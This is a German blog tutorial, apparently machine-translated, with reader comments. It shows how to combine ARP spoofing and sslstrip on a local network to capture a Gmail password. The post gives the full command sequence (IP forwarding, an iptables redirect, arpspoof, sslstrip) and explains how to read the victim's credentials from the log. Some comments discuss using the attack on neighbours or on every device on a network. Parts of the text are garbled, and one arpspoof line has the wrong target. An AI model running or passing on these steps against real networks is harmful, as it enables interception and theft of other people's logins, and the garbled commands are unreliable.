ArpSpoofing und SSlstrip in Aktion.

Hallo Blogger.

Für heute habe ich eine kleine Auswahl davon, wie gefährlich es sein kann, mit einem ungesicherten Netzwerk derer verbunden zu sein, die so viele von uns mögen.

Für heute werde ich ArpSpoofing mit Sslstrip verwenden, um ein Google Mail-Passwort zu erhalten. Um die Umgebung besser kontrollieren zu können, habe ich ein Konto mit dem Namen "testarp@gmail.com".

Und da ich die Präambeln nicht sehr mag, kommen wir zur Sache.

Ich bin zu keinem Zeitpunkt dafür verantwortlich, was sie mit den folgenden Informationen tun können. Ich mache es ausschließlich zu Bildungszwecken

UMWELT

Für diesen Test haben wir Folgendes:

1. Angreifer: Es ist mein Desktop oder Desktop-Computer mit Debian Wheezy. Aus Repositorys können Sie installieren sslstrip y dsniff zu haben zu haben Arpspoofing

2. Opfer: Das Opfer ist ein Android-Tablet, das seine E-Mails nur über den Browser sehen möchte.

3. Das Medium: Die Mitte ist meine Cisco DPC2425 Router

ADRESSEN.

Angreiferadresse: 172.26.0.2

Router-Adresse: 172.26.0.1

Adresse des Opfers: 172.26.0.8

DER ANGRIFF:

Um ein bisschen mehr zu verstehen, wie der Angriff funktioniert, kannst du zu meinem alten gehen jetzt lesen

Das erste, was wir für diesen Angriff tun werden, ist die Weiterleitung zu aktivieren, damit unser Computer die Informationen an das Opfer weiterleiten kann, ohne dass sie es bemerken. (Andernfalls wäre es ein Denial-of-Services-Angriff.)

Dafür werden wir verwenden:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Jeder Befehl in einem direkten Konsolenfenster.

Wenn wir nun tail -f ausführen desdelinux Wir sehen die Informationen live und direkt

Schnappschuss1

Wie bekommen wir dann, was wir wollen?

Lassen Sie uns zuerst unsere Mail auf dem Tablet eingeben. Beim Anmelden sehen wir, dass Tausende und Abertausende von Dingen auf unserer Konsole angezeigt werden.

Nachdem es nun fertig ist, öffnen wir unsere Datei.desdelinux” mit Nano

nano desdelinux

Mit Strg + W suchen wir nach etwas, das SECURE POST heißt.

Und wir werden so etwas sehen.

Schnappschuss2

Zu dieser riesigen Zeile, die nicht sichtbar ist, gehören die E-Mail-Adresse und das Passwort des Opfers.

Also rennen wir nach rechts, bis wir endlich das Licht am Ende des Tunnels sehen.

Schnappschuss3

Bei einer anderen Gelegenheit werden wir sehen, wie wir uns ein wenig vor diesen Angriffen schützen können.

Grüße


Hinterlasse einen Kommentar

Ihre E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert mit *

*

*

  1. Verantwortlich für die Daten: Miguel Ángel Gatón
  2. Zweck der Daten: Kontrolle von SPAM, Kommentarverwaltung.
  3. Legitimation: Ihre Zustimmung
  4. Übermittlung der Daten: Die Daten werden nur durch gesetzliche Verpflichtung an Dritte weitergegeben.
  5. Datenspeicherung: Von Occentus Networks (EU) gehostete Datenbank
  6. Rechte: Sie können Ihre Informationen jederzeit einschränken, wiederherstellen und löschen.

  1.   @ Jlcmux sagte

    Ich nutze diese Gelegenheit, um zu sagen, dass die Befehle zum Zeitpunkt der Veröffentlichung des Beitrags nicht richtig waren.

    Dem Befehl iptables am Ende fehlt der 8080 in einer anderen Zeile. Und dann befanden sich die arpspoof-Befehle alle in derselben Zeile. Jeder Befehl befindet sich in einer anderen Zeile.

    Hoffentlich sieht der Editor es und kann es beheben.

    Grüße.

    1.    Handbuch der Quelle sagte

      Ich habe die von Ihnen erwähnten Korrekturen vorgenommen. Ist das in Ordnung?

      Wenn Sie Code in einen bevorzugten Eintrag einfügen möchten, verwenden Sie die HTML-Ansicht und überprüfen Sie, ob der Artikel korrekt ist, bevor Sie ihn an ausstehend senden. Vielen Dank.

  2.   Luis sagte

    Es ist erschreckend zu wissen, dass diejenigen von uns, die kein Wissen haben, so verletzlich sind. Sehr gute Informationen, auch wenn ich wenig über das Thema verstehe, erkenne ich die Wichtigkeit. Dankeschön!
    Grüße

  3.   giskard sagte

    Dies funktioniert jedoch nur, wenn sich der Angreifer und das Opfer im selben Netzwerk befinden. Auf jeden Fall scheint es mir, dass wenn Sie (im selben Netzwerk) eine Verbindung über HTTPS herstellen, dies nicht geschieht, weil die Daten verschlüsselt sind, bevor Sie Ihren Computer verlassen. Wenn Sie eine Verbindung über HTTP (ohne S) herstellen, werden die Schlüssel auch beim Betrachten des Netzwerkkabels angezeigt.

    1.    @ Jlcmux sagte

      Es ist nicht wahr. Ich hacke ein Google Mail-Passwort und wenn Sie bemerken, dass Google Mail https verwendet. Damit? Der Punkt ist, dass https zwar sicher ist, aber von http abhängt. Es ist also nicht so sicher.

      Bekenne nicht so viel über ein https, dass das S nicht für Superman ist, sondern für "sicher"

    2.    Rten sagte

      es funktioniert mit oder ohne https, ich habe es mit einer spezialisierteren Linux-Distribution versucht und es funktioniert ohne Probleme

    3.    Handbuch der Quelle sagte

      Sie können es genau verwenden, um denjenigen eine Lektion zu erteilen, die Ihr WLAN stehlen. 😀

      Es ist mehr oder weniger so, wie sie es vor langer Zeit auf Chema Alonsos Blog gesagt haben:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Strahlend sagte

        Ostia, toll, was es macht! / Und dann erzählen sie meinem Paranoiden jedes Mal, wenn ich das VPN benutze, wenn sie das Bankkonto überprüfen…). Übrigens muss man in den Kommentaren sehen, wie zynisch die Leute sind ... wenn es am Ende stiehlt ...

        1.    eliotime3000 sagte

          Jetzt müssen wir ein Tutorial zum Erstellen und Anbieten Ihres eigenen VPN-Dienstes erstellen.

      2.    Matthias sagte

        Die Geschichte, die Sie verlinken, ist sehr interessant, sie scheint sogar eines neuartigen Buches würdig zu sein, und das erinnert mich daran, als ich das Internet meiner Nachbarn nutzte, und obwohl ich sage, dass ich das Thema kenne, denke ich, dass ich die wahren Dimensionen des Buches nie erkennen konnte Die Gefahr, die ich hätte haben können, zum Glück für mich, sie haben nur das Passwort in WPA2 geändert und dort begann meine Geschichte mit dem ISP haha

    4.    Mauritius sagte

      Deshalb steht im Titel Sslstrip in Aktion.

      Es funktioniert, solange sich der Angreifer in der Mitte befindet

  4.   alsbald sagte

    Welche Welle arbeitest du am Prisma? -.-
    Nr.
    Worauf warten Sie noch, um Ihre Anfrage XD zu senden?
    Grüße
    guter Beitrag

  5.   auroszx sagte

    Interessant, ich mache später einen pädagogischen Test ... Vielleicht könnte ich sogar das Passwort für das WiFi entfernen und ein bisschen Spaß haben 😛
    Können Sie zufällig etwas Ähnliches tun, um verschiedene Seiten an die vom Ziel angeforderten zu senden? Zum Beispiel möchten sie Facebook öffnen und ich leite sie an Google weiter? 😛

    1.    @ Jlcmux sagte

      Ja. Aber es ist alles eine ganz andere Rolle.

      Vielleicht poste ich es später.

  6.   letzter Neuling sagte

    Sehr guter Beitrag, diese Themen sind sehr lehrreich, jetzt müssen wir in der Lage sein, diesem Angriff entgegenzuwirken, da einige (wie ich) eine Verbindung zu öffentlichen Netzwerken herstellen (zum Beispiel die Universität). Es wäre hilfreich, dies zu vermeiden.

    Viele Grüße!

  7.   nur-ein-anderer-dl-benutzer sagte

    Bei mir hat es nicht funktioniert 🙁

  8.   Beeindruckend sagte

    Hier fällt mir etwas aus, abgesehen von der Tatsache, dass https-Verbindungen über ein Serverzertifikat (sobald Sie das Zertifikat auf Ihrem Computer haben, ist Ihr Browser für die Verschlüsselung verantwortlich) mit iptables verschlüsselt werden, leiten Sie Port 80 (http) um, nicht 443 ist https

    1.    @ Jlcmux sagte

      Das dachte ich auch. Der Punkt ist, dass https zwar "sicher" ist, aber leider von http abhängt. Sslstrip nutzt dies aus und lässt den Browser glauben, dass er https-Anmeldeinformationen verwendet, dies jedoch nicht.

      1.    Beeindruckend sagte

        Heilige Scheiße! Aber der Browser sollte eine Warnung wie "Dieses Zertifikat stammt von einer verdächtigen Site oder so etwas" sehen ... Ich werde definitiv XD-Tests durchführen müssen

        1.    @ Jlcmux sagte

          Nein, es kommt absolut nichts heraus.

  9.   nur-ein-anderer-dl-benutzer sagte

    Es hat endlich bei mir funktioniert
    Ich bin in einem WEP-Netzwerk mit einem Passwort verbunden und es hat mir das Passwort trotzdem direkt angezeigt.

    Eine Anfrage. Können Sie dasselbe Verfahren ausführen, jedoch für alle Computer, die im Netzwerk verbunden sind, anstatt nur ein einziges Opfer zu haben?

    1.    @ Jlcmux sagte

      Ja, du kannst. Aber ich habe keine Experimente gemacht. Probieren Sie es aus und sagen Sie uns, wie es Ihnen geht.

  10.   Sinn19 sagte

    Das einzige, was ich damit bekomme, ist, dass die Maschine des Opfers offline geht, aber der sslstrip zeigt mir nichts: /

    1.    @ Jlcmux sagte

      Sie müssen die Firewall für einen Moment deaktivieren. Oder zumindest eingehende Verbindungen aktivieren.

  11.   Herr Schwarz sagte

    Probe und ich konnten nur den Benutzernamen und das Passwort der Facebook-Seite sehen. In Google Mail habe ich keine Ergebnisse im Protokoll gefunden. Außerdem benötigte ich nur eine Zeile mit arpspoof «arpspoof -i -t«. Andererseits konnte der Opfercomputer einige Seiten nicht öffnen. Ich werde weiter nachforschen, es ist sehr interessant. Eine Hilfe für diejenigen, die Manjaro verwenden, sind die zu installierenden Pakete: dsniff (hier ist arpspoff), twisted und python2-pyopenssl. Sslstrip kann hier heruntergeladen werden: http://www.thoughtcrime.org/software/sslstrip/
    Um es auszuführen, $ python2 sslstrip.py
    Grüße.

  12.   Herr Schwarz sagte

    Es kam nicht heraus, aber die Arpspoof-Zeile lautet: #arpspoof -i int -t IP-Opfer IP-Router

  13.   Gilbert sagte

    schau ich mache genau das was du sagst:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –Zielport 80 -j REDIRECT –to-Ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Das Problem ist, dass das Opfer, das ein anderer PC ist, den ich hier in meinem Zimmer habe, keine Verbindung zu dem Punkt hat, an dem ich den Router neu starten muss. Was kann ich tun, um mir zu helfen?

    Eine andere Sache, die ich mit einer virtuellen Maschine arbeite, und wenn ich den Befehl iwconfig ausführe, wird wlan0 nicht angezeigt, noch wenn ich ifconfig ausführe. Wenn ich jedoch Internet auf meiner virtuellen Maschine habe, was mit einer eth0-Schnittstelle.